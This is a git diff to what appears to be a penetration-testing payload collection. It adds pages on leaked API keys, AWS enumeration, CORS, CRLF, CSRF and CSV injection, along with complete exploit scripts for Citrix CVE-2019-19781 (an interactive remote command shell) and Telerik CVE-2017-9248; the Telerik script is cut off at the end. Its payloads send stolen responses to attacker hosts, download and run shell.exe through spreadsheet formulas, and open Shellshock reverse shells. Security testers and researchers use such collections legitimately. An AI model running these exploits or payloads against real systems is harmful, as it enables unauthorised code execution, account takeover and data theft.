diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 00000000..8b5d40b6
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,5 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+ko_fi: swissky # Replace with a single Ko-fi username
+custom: https://www.buymeacoffee.com/swissky
diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
new file mode 100644
index 00000000..8be1b6f7
--- /dev/null
+++ b/API Key Leaks/README.md	
@@ -0,0 +1,128 @@
+# API Key Leaks
+
+> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares.
+
+## Summary
+
+- [Tools](#tools)
+- [Exploit](#exploit)
+    - [Google Maps](#google-maps)
+    - [Algolia](#algolia)
+    - [AWS Access Key ID & Secret](#aws-access-key-id--secret)
+    - [Slack API Token](#slack-api-token)
+    - [Facebook Access Token](#facebook-access-token)
+    - [Github client id and client secret](#github-client-id-and-client-secret)
+    - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
+    - [Twitter API Secret](#twitter-api-secret)
+    - [Twitter Bearer Token](#twitter-bearer-token)
+    - [Gitlab Personal Access Token](#gitlab-personal-access-token)
+    - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
+
+
+## Tools
+
+- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
+- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
+
+## Exploit
+
+The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
+
+### Google Maps 
+
+Use : https://github.com/ozguralp/gmapsapiscanner/
+
+Impact:
+* Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
+* Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
+
+### Algolia 
+
+```powershell
+curl --request PUT \
+  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
+  --header 'content-type: application/json' \
+  --header 'x-algolia-api-key: <example-key>' \
+  --header 'x-algolia-application-id: <example-application-id>' \
+  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
+```
+
+### AWS Access Key ID & Secret
+
+```powershell
+git clone https://github.com/andresriancho/enumerate-iam
+cd enumerate-iam
+./enumerate-iam.py --access-key AKIA... --secret-key XXX..
+```
+
+### Slack API Token
+
+```powershell
+curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
+```
+
+### Facebook Access Token
+
+```powershell
+curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
+```
+
+### Github client id and client secret
+
+```powershell
+curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
+```
+
+### Twilio Account_sid and Auth token
+
+```powershell
+curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
+```
+
+### Twitter API Secret
+
+```powershell
+curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
+```
+
+### Twitter Bearer Token
+
+```powershell
+curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
+```
+
+### Gitlab Personal Access Token
+
+```powershell
+curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
+```
+
+
+### Auth Bypass using pre-published Machine Key
+
+> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
+
+That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
+
+Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
+
+```xml
+<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
+```
+
+Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
+
+```powershell
+# decrypt cookie
+$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
+
+# encrypt cookie (edit Decrypted.txt)
+$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
+```
+
+
+## References
+
+* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
+* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)
+* [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/)
\ No newline at end of file
diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md
index 10221757..e9a574f5 100644
--- a/AWS Amazon Bucket S3/README.md	
+++ b/AWS Amazon Bucket S3/README.md	
@@ -152,22 +152,24 @@ aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWr
 ## AWS - Extract Backup
 
 ```powershell
-aws --profile flaws sts get-caller-identity
+$ aws --profile flaws sts get-caller-identity
 "Account": "XXXX26262029",
 
-aws --profile flaws  ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2    
+
+$ aws --profile profile_name ec2 describe-snapshots
+$ aws --profile flaws  ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2    
 "SnapshotId": "snap-XXXX342abd1bdcb89",
 
 Create a volume using snapshot
-aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
+$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
 In Aws Console -> EC2 -> New Ubuntu
-chmod 400 YOUR_KEY.pem
-ssh -i YOUR_KEY.pem  ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
+$ chmod 400 YOUR_KEY.pem
+$ ssh -i YOUR_KEY.pem  ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
 
 Mount the volume
-lsblk
-sudo file -s /dev/xvda1
-sudo mount /dev/xvda1 /mnt
+$ lsblk
+$ sudo file -s /dev/xvda1
+$ sudo mount /dev/xvda1 /mnt
 ```
 
 ## Bucket juicy data
@@ -184,6 +186,32 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 
 
+## Enumerate IAM permissions
+
+Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
+
+```powershell
+git clone git@github.com:andresriancho/enumerate-iam.git
+cd enumerate-iam/
+pip install -r requirements.txt
+./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
+2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
+2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
+2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
+    "RoleDetailList": [
+        {
+            "Tags": [], 
+            "AssumeRolePolicyDocument": {
+                "Version": "2008-10-17", 
+                "Statement": [
+                    {
+...
+2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
+2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
+2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
+2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
+2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
+```
 
 ## References
 
@@ -192,3 +220,6 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
 * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
 * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
+* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
+* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
+* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)
\ No newline at end of file
diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
new file mode 100644
index 00000000..7d4d715b
--- /dev/null
+++ b/CORS Misconfiguration/README.md	
@@ -0,0 +1,180 @@
+# CORS Misconfiguration
+
+> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
+
+## Summary
+
+* [Prerequisites](#prerequisites)
+* [Exploitation](#exploitation)
+* [References](#references)
+
+## Prerequisites
+
+* BURP HEADER> `Origin: https://evil.com`
+* VICTIM HEADER> `Access-Control-Allow-Credential: true`
+* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
+
+## Exploitation
+
+Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
+
+### Vulnerable Example: Origin Reflection
+
+#### Vulnerable Implementation
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: victim.example.com
+Origin: https://evil.com
+Cookie: sessionid=... 
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: https://evil.com
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://victim.example.com/endpoint',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
+or 
+
+```html
+<html>
+     <body>
+         <h2>CORS PoC</h2>
+         <div id="demo">
+             <button type="button" onclick="cors()">Exploit</button>
+         </div>
+         <script>
+             function cors() {
+             var xhr = new XMLHttpRequest();
+             xhr.onreadystatechange = function() {
+                 if (this.readyState == 4 && this.status == 200) {
+                 document.getElementById("demo").innerHTML = alert(this.responseText);
+                 }
+             };
+              xhr.open("GET",
+                       "https://victim.example.com/endpoint", true);
+             xhr.withCredentials = true;
+             xhr.send();
+             }
+         </script>
+     </body>
+ </html>
+```
+
+### Vulnerable Example: Null Origin
+
+#### Vulnerable Implementation
+
+It's possible that the server does not reflect the complete `Origin` header but
+that the `null` origin is allowed. This would look like this in the server's
+response:
+
+```
+GET /endpoint HTTP/1.1
+Host: victim.example.com
+Origin: null
+Cookie: sessionid=... 
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: null
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+This can be exploited by putting the attack code into an iframe using the data
+URI scheme. If the data URI scheme is used, the browser will use the `null`
+origin in the request:
+
+```html
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
+  var req = new XMLHttpRequest ();
+  req.onload = reqListener;
+  req.open('get','https://victim.example.com/endpoint',true);
+  req.withCredentials = true;
+  req.send();
+
+  function reqListener() {
+    location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
+   };
+</script>"></iframe> 
+```
+
+### Vulnerable Example: XSS on Trusted Origin
+
+If the application does implement a strict whitelist of allowed origins, the
+exploit codes from above do not work. But if you have an XSS on a trusted
+origin, you can inject the exploit coded from above in order to exploit CORS
+again.
+
+```
+https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
+```
+
+### Vulnerable Example: Wildcard Origin `*` without Credentials
+
+If the server responds with a wildcard origin `*`, the browser does never send
+the cookies. Howver, if the server does not require authentication, it's still
+possible to access the data on the server. This can happen on internal servers
+that are not accessible from the Internet. The attacker's website can then
+pivot into the internal network and access the server's data withotu
+authentication.
+
+#### Vulnerable Implementation
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: api.internal.example.com
+Origin: https://evil.com
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://api.internal.example.com/endpoint',true); 
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
+## Bug Bounty reports
+
+* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
+* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
+* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
+* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
+* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
+
+## References
+
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
+* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md
index 862a3e58..534228a7 100644
--- a/CRLF Injection/README.md	
+++ b/CRLF Injection/README.md	
@@ -1,8 +1,16 @@
 # CRLF
 
-The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
+>The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
 
-A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
+>A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
+
+## Summary
+
+- [CRLF - Add a cookie](#crlf---add-a-cookie)
+- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
+- [CRLF - Write HTML](#crlf---write-html)
+- [CRLF - Filter Bypass](#crlf---filter-bypass)
+- [References](#references)
 
 ## CRLF - Add a cookie
 
diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md
index 7deed48b..77fd4b44 100644
--- a/CSRF Injection/README.md	
+++ b/CSRF Injection/README.md	
@@ -7,6 +7,18 @@
 
 * [Methodology](#methodology)
 * [Payloads](#payloads)
+    * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
+    * [HTML GET - No User Interaction)](#html-get---no-user-interaction)
+    * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
+    * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
+    * [JSON GET - Simple Request](#json-get---simple-request)
+    * [JSON POST - Simple Request](#json-post---simple-request)
+    * [JSON POST - Complex Request](#json-post---complex-request)
+* [References](#references)
+
+## Tools
+
+* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
 
 ## Methodology
 
@@ -16,19 +28,19 @@
 
 When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
 
-### HTML GET – Requiring User Interaction for Proof-of-Concept
+### HTML GET - Requiring User Interaction
 
 ```html
 <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
 ```
 
-### HTML GET (No User Interaction)
+### HTML GET - No User Interaction
 
 ```html
 <img src="http://www.example.com/api/setusername?username=CSRFd">
 ```
 
-### HTML POST – Requiring User Interaction for Proof-of-Concept
+### HTML POST - Requiring User Interaction
 
 ```html
 <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
@@ -37,7 +49,7 @@ When you are logged in to a certain site, you typically have a session. The iden
 </form>
 ```
 
-### HTML POST (AutoSubmit – No User Interaction)
+### HTML POST - AutoSubmit - No User Interaction
 
 ```html
 <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
@@ -51,7 +63,7 @@ When you are logged in to a certain site, you typically have a session. The iden
 ```
 
 
-### JSON GET – Simple Request
+### JSON GET - Simple Request
 
 ```html
 <script>
@@ -61,7 +73,7 @@ xhr.send();
 </script>
 ```
 
-### JSON POST – Simple Request
+### JSON POST - Simple Request
 
 ```html
 <script>
@@ -76,7 +88,7 @@ xhr.send('{"role":admin}');
 </script>
 ```
 
-### JSON POST – Complex Request
+### JSON POST - Complex Request
 
 ```html
 <script>
@@ -102,4 +114,5 @@ xhr.send('{"role":admin}');
 - [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
 - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
 - [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
-- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
\ No newline at end of file
+- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
+- [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
diff --git a/CSV Injection/README.md b/CSV Injection/README.md
index 126105d6..8a205865 100644
--- a/CSV Injection/README.md	
+++ b/CSV Injection/README.md	
@@ -7,10 +7,19 @@ Many web applications allow the user to download content such as templates for i
 Basic exploit with Dynamic Data Exchange
 
 ```powershell
+# pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
 @SUM(1+1)*cmd|' /C calc'!A0
+=2+5+cmd|' /C calc'!A0
+
+# pop a notepad
 =cmd|' /C notepad'!'A1'
+
+# powershell download and execute
 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
+
+# msf smb delivery with rundll32
+=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 ```
 
 Technical Details of the above payload:
@@ -34,4 +43,6 @@ Any formula can be started with
 * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
 * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
-* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
\ No newline at end of file
+* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
+* [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
+* [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
\ No newline at end of file
diff --git a/CVE Exploits/Citrix CVE-2019-19781.py b/CVE Exploits/Citrix CVE-2019-19781.py
new file mode 100644
index 00000000..a6d4044d
--- /dev/null
+++ b/CVE Exploits/Citrix CVE-2019-19781.py	
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+# https://github.com/mpgn/CVE-2019-19781
+# # #
+
+import requests
+import string
+import random
+import re
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
+print("Found by Mikhail Klyuchnikov")
+print("")
+
+if len(sys.argv) < 2:
+  print("[-] No URL provided")
+  sys.exit(0)
+
+while True:
+    try:
+      command = input("command > ")
+
+      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
+      print("[+] Adding bookmark", random_xml + ".xml")
+
+      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
+      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
+
+      if r.status_code == 200:
+        print("[+] Bookmark added")
+      else:
+        print("\n[-] Target not vulnerable or something went wrong")
+        sys.exit(0)
+
+      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
+      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
+      r = requests.get(burp0_url, headers=burp0_headers,verify=False)
+
+      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
+      print("[+] Result of the command: \n")
+      print(replaced)
+
+    except KeyboardInterrupt:
+            print("Exiting...")
+            break
\ No newline at end of file
diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md
index 41b223c6..6b248239 100644
--- a/CVE Exploits/README.md	
+++ b/CVE Exploits/README.md	
@@ -10,8 +10,9 @@ The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptograph
 
 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
 
-```bash
-echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.0.XX 4444 -e /bin/sh\r\n
+```powershell
+echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0.0.2 4444 -e /bin/sh\r\n"
+curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 
 ```
 
 ## CVE-2017-5638 - Apache Struts 2
@@ -22,6 +23,20 @@ On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2
 
 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
 
+## CVE-2019-19781 -  Citrix ADC Netscaler
+
+A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
+
+Technology Affect:
+- Citrix ADC and Citrix Gateway version 13.0 all supported builds
+- Citrix ADC and NetScaler Gateway version 12.1 all supported builds
+- Citrix ADC and NetScaler Gateway version 12.0 all supported builds
+- Citrix ADC and NetScaler Gateway version 11.1 all supported builds
+- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
+
+
+
+
 ## Thanks to
 
 * [Heartbleed - Official website](http://heartbleed.com)
diff --git a/CVE Exploits/Telerik CVE-2017-9248.py b/CVE Exploits/Telerik CVE-2017-9248.py
new file mode 100644
index 00000000..330c887d
--- /dev/null
+++ b/CVE Exploits/Telerik CVE-2017-9248.py	
@@ -0,0 +1,362 @@
+# Author: Paul Taylor / @bao7uo
+
+# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
+
+# dp_crypto - CVE-2017-9248 exploit
+# Telerik.Web.UI.dll Cryptographic compromise
+
+# Warning - no cert warnings,
+# and verify = False in code below prevents verification
+
+import sys
+import base64
+import requests
+import re
+import binascii
+import argparse
+
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+requests_sent = 0
+char_requests = 0
+
+
+def getProxy(proxy):
+    return { "http" : proxy, "https" : proxy }
+
+
+def get_result(plaintext, key, session, pad_chars):
+    global requests_sent, char_requests
+
+    url = args.url
+    base_pad = (len(key) % 4)
+    base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
+    dp_encrypted = base64.b64encode(
+                                (encrypt(plaintext, key) + base).encode()
+                            ).decode()
+    request = requests.Request('GET', url + '?dp=' + dp_encrypted)
+    request = request.prepare()
+    response = session.send(request, verify=False, proxies = getProxy(args.proxy))
+    requests_sent += 1
+    char_requests += 1
+
+    match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
+    return True \
+        if match is not None \
+        and match.group(2) == args.oracle \
+        else False
+
+def test_keychar(keychar, found, session, pad_chars):
+    base64chars = [
+                    "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
+                    "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
+                    "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
+                    "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
+                    "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
+                    "P", "f", "v", "/"
+                  ]
+
+    duff = False
+    accuracy_thoroughness_threshold = args.accuracy
+    for bc in range(int(accuracy_thoroughness_threshold)):
+                                                # ^^ max is len(base64chars)
+        sys.stdout.write("\b\b" + base64chars[bc] + "]")
+        sys.stdout.flush()
+        if not get_result(
+                      base64chars[0] * len(found) + base64chars[bc],
+                      found + keychar, session, pad_chars
+                      ):
+            duff = True
+            break
+    return False if duff else True
+
+
+def encrypt(dpdata, key):
+    encrypted = []
+    k = 0
+    for i in range(len(dpdata)):
+        encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
+        k = 0 if k >= len(key) - 1 else k + 1
+    return ''.join(str(e) for e in encrypted)
+
+
+def mode_decrypt():
+    ciphertext = base64.b64decode(args.ciphertext).decode()
+    key = args.key
+    print(base64.b64decode(encrypt(ciphertext, key)).decode())
+    print("")
+
+
+def mode_encrypt():
+    plaintext = args.plaintext
+    key = args.key
+
+    plaintext = base64.b64encode(plaintext.encode()).decode()
+    print(base64.b64encode(encrypt(plaintext, key).encode()).decode())
+    print("")
+
+
+def test_keypos(key_charset, unprintable, found, session):
+    pad_chars = ''
+    for pad_char in range(256):
+        pad_chars += chr(pad_char)
+
+    for i in range(len(pad_chars)):
+        for k in range(len(key_charset)):
+            keychar = key_charset[k]
+            sys.stdout.write("\b"*6)
+            sys.stdout.write(
+                        (
+                            keychar
+                            if unprintable is False
+                            else '+'
+                        ) +
+                        ") [" + (
+                            keychar
+                            if unprintable is False
+                            else '+'
+                        ) +
+                        "]"
+                    )
+            sys.stdout.flush()
+            if test_keychar(keychar, found, session, pad_chars[i] * 3):
+                return keychar
+    return False
+
+
+def get_key(session):
+    global char_requests
+    found = ''
+    unprintable = False
+
+    key_length = args.key_len
+    key_charset = args.charset
+    if key_charset == 'all':
+        unprintable = True
+        key_charset = ''
+        for i in range(256):
+            key_charset += chr(i)
+    else:
+        if key_charset == 'hex':
+            key_charset = '01234567890ABCDEF'
+
+    print("Attacking " + args.url)
+    print(
+        "to find key of length [" +
+        str(key_length) +
+        "] with accuracy threshold [" +
+        str(args.accuracy) +
+        "]"
+    )
+    print(
+        "using key charset [" +
+        (
+            key_charset
+            if unprintable is False
+            else '- all ASCII -'
+        ) +
+        "]\n"
+    )
+    for i in range(int(key_length)):
+        pos_str = (
+            str(i + 1)
+            if i > 8
+            else "0" + str(i + 1)
+        )
+        sys.stdout.write("Key position " + pos_str + ": (------")
+        sys.stdout.flush()
+        keychar = test_keypos(key_charset, unprintable, found, session)
+        if keychar is not False:
+            found = found + keychar
+            sys.stdout.write(
+                          "\b"*7 + "{" +
+                          (
+                              keychar
+                              if unprintable is False
+                              else '0x' + binascii.hexlify(keychar.encode()).decode()
+                          ) +
+                          "} found with " +
+                          str(char_requests) +
